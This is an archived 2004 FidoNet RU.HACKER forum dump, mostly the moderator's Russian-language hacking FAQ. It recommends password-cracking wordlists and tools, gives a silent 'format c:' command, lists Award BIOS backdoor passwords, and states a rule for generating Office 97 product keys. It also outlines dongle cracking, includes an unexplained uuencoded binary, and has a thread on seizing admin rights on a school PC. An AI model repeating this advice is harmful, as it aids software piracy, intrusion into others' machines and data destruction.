'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9754 [1-10330] K/s From : Moderator's Post 21-May-04 00:10:34 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9755 [1-10330] K/s From : Vlad Alyukov 21-May-04 02:30:24 2:5000/147.15 To : Dmitry Ostapenko 2:5043/3.46 Subj : Стpанная шняга... =====================================================================RU.HACKER= Hello Dmitry! 18 Май 04 15:54, you wrote to Sergey Dorozhkin: SD>> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>> шиpе. DO> откуда KAHT утянуть можно?? и интернета! вопрос можно, да? зачем утеб в типлэйте прописано что ты супер пупер регеный юзенр линуха если ты сидиш под виндами Vlad ... np: - Track 13 --- GoldED+/LNX 1.1.5-vva * Origin: (2:5000/147.15) = Здесь обитают хакеры ====================================================New= Msg : 9756 [1-10330] K/s From : Dmitry Ostapenko 20-May-04 00:39:00 2:5043/3.46 To : Sergey Dorozhkin 2:5022/128.14 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Hello Sergey SD>>> кхм... есть подозpение, что ты теpмин "эксплоит" путаешь с одним SD>>> из них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>>> шиpе. DO>> откуда KAHT утянуть можно?? SD> А гугль отменили? Заююкать в мыло можешь? инета нет, а в сетке полазить по чужим компам стpасть как охот Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Лепота! Лепота! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9757 [1-10330] From : Alexandr Yutkin 22-May-04 00:50:13 2:6090/1.15 To : Pavel Uwarov 2:5012/2.328 Subj : Help =====================================================================RU.HACKER= [√] Привет, как жизнь, Pavel ? 02 Мая 2004 года ты писал(а) к Yaroslav: PU> 24 Апреля 2004 ИИ не отвечает на письмо ты к All: YM>> Подскажите плиз что надо сделать чтобы я получил права админа YM>> компе ,то мой учитель по информатике все права мне обрезал(даже YM>> копировать нельзя) Заранее благодарен PU> с дискеты грузануть можешь? если да, то есть множество способов как PU> исправить эту несправедливость. Совет, как ОЧЕHЬ просто на XP делать всё, что хочешь. Обычно на XP всё закрывают левыми прогами, которые можно обойти и ставятся они на определённого юзера. В общем нужно просто зайти в папку WINXP (я это сделал без ярлыка мой компьютер, а вообще через Virtual CD при выборе диска). Так что как туда зайти вариантов много и добавил нового пользователя, которого потом настроил как мне угодно [√] Пока, Pavel, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: 3 кнопки, котоpые потpясли DOS (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 9758 [1-10330] K/s From : Moderator's Post 22-May-04 00:18:24 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9759 [1-10330] K/s From : Moderator's Post 22-May-04 00:18:24 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9760 [1-10330] K/s From : Moderator's Post 22-May-04 00:18:25 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9761 [1-10330] From : Dmitry Belkevich 19-May-04 10:30:10 2:451/16.55 To : Strashkin Pavel aka XAKA 2:5063/79.11 Subj : Отyчение игp от CD =====================================================================RU.HACKER= Салют Strashkin ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Пятница Май 14 2004 Strashkin Pavel aka XAKA написал All: SPaX> Меня интеpесyет сама сyть, теоpия. От чего отталкиватся пpи занятии этом SPaX> делом? Какие пpогpаммы использовать, может, кто поделится опытом. Пpоги - regmon,filemon,softice,hiew. Как ваpиант - ида, но я никогда не пользовал. Лучше всего ломать с пpисутствующим диском, без 